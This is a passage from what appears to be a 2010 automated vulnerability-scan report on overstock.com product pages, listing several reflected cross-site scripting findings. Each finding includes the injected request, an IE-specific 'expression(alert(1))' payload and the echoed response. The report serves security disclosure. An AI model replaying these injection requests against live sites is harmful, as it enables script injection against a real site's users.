Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:01 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:01 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4422101|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:01 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408281802:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:01 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=56
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 120041

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Pa
...[SNIP]...
<input type="hidden" name="5eac5"style="x:expression(alert(1))"c658ba364b" value="1"/>
...[SNIP]...

2.62. http://www.overstock.com/Clothing-Shoes/Peach-Couture-Eco-friendly-Rayon-from-Bamboo-Pashmina/5206424/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Peach-Couture-Eco-friendly-Rayon-from-Bamboo-Pashmina/5206424/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e8d6"style%3d"x%3aexpression(alert(1))"108d0b06648 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e8d6"style="x:expression(alert(1))"108d0b06648 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Peach-Couture-Eco-friendly-Rayon-from-Bamboo-Pashmina/5206424/product.html?9e8d6"style%3d"x%3aexpression(alert(1))"108d0b06648=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:10 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:10 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404930413:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5206424|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:10 GMT; Path=/
Keep-Alive: timeout=5, max=12
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 103678

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Pe
...[SNIP]...
<input type="hidden" name="9e8d6"style="x:expression(alert(1))"108d0b06648" value="1"/>
...[SNIP]...

2.63. http://www.overstock.com/Clothing-Shoes/Peach-Couture-Silver-Rayon-from-Bamboo-Pashmina/5286113/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Peach-Couture-Silver-Rayon-from-Bamboo-Pashmina/5286113/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac5ee"style%3d"x%3aexpression(alert(1))"95ea8f2b043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ac5ee"style="x:expression(alert(1))"95ea8f2b043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Peach-Couture-Silver-Rayon-from-Bamboo-Pashmina/5286113/product.html?ac5ee"style%3d"x%3aexpression(alert(1))"95ea8f2b043=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:51 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:51 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=5286113|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:51 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404971351:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:51 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=2
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 105040

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Pe
...[SNIP]...
<input type="hidden" name="ac5ee"style="x:expression(alert(1))"95ea8f2b043" value="1"/>
...[SNIP]...

2.64. http://www.overstock.com/Clothing-Shoes/Peppers-Ambassador-Mens-Floating-Collection-Sunglasses/4099996/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Peppers-Ambassador-Mens-Floating-Collection-Sunglasses/4099996/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b23c2"style%3d"x%3aexpression(alert(1))"428f9b27895 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b23c2"style="x:expression(alert(1))"428f9b27895 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Peppers-Ambassador-Mens-Floating-Collection-Sunglasses/4099996/product.html?b23c2"style%3d"x%3aexpression(alert(1))"428f9b27895=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:00 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:00 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:00 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4099996|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:00 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408220410:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114472

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Pe
...[SNIP]...
<input type="hidden" name="b23c2"style="x:expression(alert(1))"428f9b27895" value="1"/>
...[SNIP]...

2.65. http://www.overstock.com/Clothing-Shoes/Peppers-Sportsman-Floating-Sandbar-Mens-Sunglasses/4099978/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Peppers-Sportsman-Floating-Sandbar-Mens-Sunglasses/4099978/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f20"style%3d"x%3aexpression(alert(1))"5a0146d5e47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5f20"style="x:expression(alert(1))"5a0146d5e47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Peppers-Sportsman-Floating-Sandbar-Mens-Sunglasses/4099978/product.html?e5f20"style%3d"x%3aexpression(alert(1))"5a0146d5e47=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:57 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:57 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4099978|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:57 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408217297:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:57 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=13
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110433

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Pe
...[SNIP]...
<input type="hidden" name="e5f20"style="x:expression(alert(1))"5a0146d5e47" value="1"/>
...[SNIP]...

2.66. http://www.overstock.com/Clothing-Shoes/Perry-Ellis-Mens-Sutton-Passcase-Wallet/4737065/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Perry-Ellis-Mens-Sutton-Passcase-Wallet/4737065/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5529"style%3d"x%3aexpression(alert(1))"6cf8dae6ef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5529"style="x:expression(alert(1))"6cf8dae6ef3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Perry-Ellis-Mens-Sutton-Passcase-Wallet/4737065/product.html?b5529"style%3d"x%3aexpression(alert(1))"6cf8dae6ef3=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:03 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:03 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408223839:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4737065|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:03 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:03 GMT; Path=/
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 104805

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Pe
...[SNIP]...
<input type="hidden" name="b5529"style="x:expression(alert(1))"6cf8dae6ef3" value="1"/>
...[SNIP]...

2.67. http://www.overstock.com/Clothing-Shoes/Presa-Kennington-Oversized-Leather-Hobo-with-Shoulder-Strap/4109778/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Presa-Kennington-Oversized-Leather-Hobo-with-Shoulder-Strap/4109778/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 886f7"style%3d"x%3aexpression(alert(1))"42e768c8803 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 886f7"style="x:expression(alert(1))"42e768c8803 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Presa-Kennington-Oversized-Leather-Hobo-with-Shoulder-Strap/4109778/product.html?886f7"style%3d"x%3aexpression(alert(1))"42e768c8803=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:31 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:31 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4109778|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:31 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408191874:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:31 GMT; Path=/
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113549

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Pr
...[SNIP]...
<input type="hidden" name="886f7"style="x:expression(alert(1))"42e768c8803" value="1"/>
...[SNIP]...

2.68. http://www.overstock.com/Clothing-Shoes/Presa-Zuma-Large-Leather-Hobo-style-Bag/4124072/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Presa-Zuma-Large-Leather-Hobo-style-Bag/4124072/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 421c7"style%3d"x%3aexpression(alert(1))"493fc4af8a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 421c7"style="x:expression(alert(1))"493fc4af8a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Presa-Zuma-Large-Leather-Hobo-style-Bag/4124072/product.html?421c7"style%3d"x%3aexpression(alert(1))"493fc4af8a3=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:19 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:19 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408179095:ccid^144812; Domain=.overstock.com; Path=/
